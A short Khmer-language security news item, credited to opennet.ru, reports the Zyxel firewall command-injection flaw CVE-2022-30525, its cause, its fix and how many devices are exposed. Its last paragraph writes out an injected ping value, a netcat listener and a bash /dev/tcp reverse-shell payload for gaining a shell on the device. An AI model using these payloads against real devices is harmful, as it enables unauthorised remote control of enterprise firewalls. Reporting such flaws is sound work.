ភាពងាយរងគ្រោះនៅក្នុងជញ្ជាំងភ្លើង Zyxel ដែលអនុញ្ញាតឱ្យដំណើរការកូដដោយគ្មានការផ្ទៀងផ្ទាត់

ភាពងាយរងគ្រោះសំខាន់ (CVE-2022-30525) ត្រូវបានកំណត់អត្តសញ្ញាណនៅក្នុងឧបករណ៍ Zyxel នៃស៊េរី ATP, VPN និង USG FLEX ដែលត្រូវបានរចនាឡើងដើម្បីរៀបចំប្រតិបត្តិការនៃជញ្ជាំងភ្លើង IDS និង VPN នៅក្នុងសហគ្រាស ដែលអនុញ្ញាតឱ្យអ្នកវាយប្រហារខាងក្រៅអាចប្រតិបត្តិកូដនៅលើ ឧបករណ៍ដោយគ្មានសិទ្ធិអ្នកប្រើប្រាស់ដោយគ្មានការផ្ទៀងផ្ទាត់។ ដើម្បីអនុវត្តការវាយប្រហារ អ្នកវាយប្រហារត្រូវតែអាចផ្ញើសំណើទៅកាន់ឧបករណ៍ដោយប្រើពិធីការ HTTP/HTTPS ។ Zyxel បានជួសជុលភាពងាយរងគ្រោះនៅក្នុងការអាប់ដេតកម្មវិធីបង្កប់ ZLD 5.30 ។ យោងតាមសេវា Shodan បច្ចុប្បន្នមានឧបករណ៍ងាយរងគ្រោះចំនួន 16213 នៅលើបណ្តាញសកលដែលទទួលយកសំណើតាមរយៈ HTTP/HTTPS ។

ប្រតិបត្តិការត្រូវបានអនុវត្តដោយការផ្ញើពាក្យបញ្ជាដែលបានរចនាឡើងជាពិសេសទៅកាន់កម្មវិធីគ្រប់គ្រងគេហទំព័រ /ztp/cgi-bin/handler ដែលអាចប្រើបានដោយមិនចាំបាច់មានការផ្ទៀងផ្ទាត់។ បញ្ហាគឺបណ្តាលមកពីការខ្វះការសម្អាតប៉ារ៉ាម៉ែត្រសំណើឱ្យបានត្រឹមត្រូវនៅពេលប្រតិបត្តិពាក្យបញ្ជានៅលើប្រព័ន្ធដោយប្រើការហៅ os.system ដែលប្រើក្នុងបណ្ណាល័យ lib_wan_settings.py ហើយត្រូវបានប្រតិបត្តិនៅពេលដំណើរការប្រតិបត្តិការ setWanPortSt ។

ឧទាហរណ៍ អ្នកវាយប្រហារអាចឆ្លងខ្សែអក្សរ “; ping 192.168.1.210;" ដែលនឹងនាំទៅដល់ការប្រតិបត្តិពាក្យបញ្ជា "ping 192.168.1.210" នៅលើប្រព័ន្ធ។ ដើម្បីទទួលបានការចូលទៅកាន់សែលពាក្យបញ្ជា អ្នកអាចដំណើរការ “nc -lvnp 1270” នៅលើប្រព័ន្ធរបស់អ្នក ហើយបន្ទាប់មកចាប់ផ្តើមការតភ្ជាប់បញ្ច្រាសដោយផ្ញើសំណើទៅកាន់ឧបករណ៍ដោយប្រើសញ្ញា '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'។

ប្រភព: opennet.ru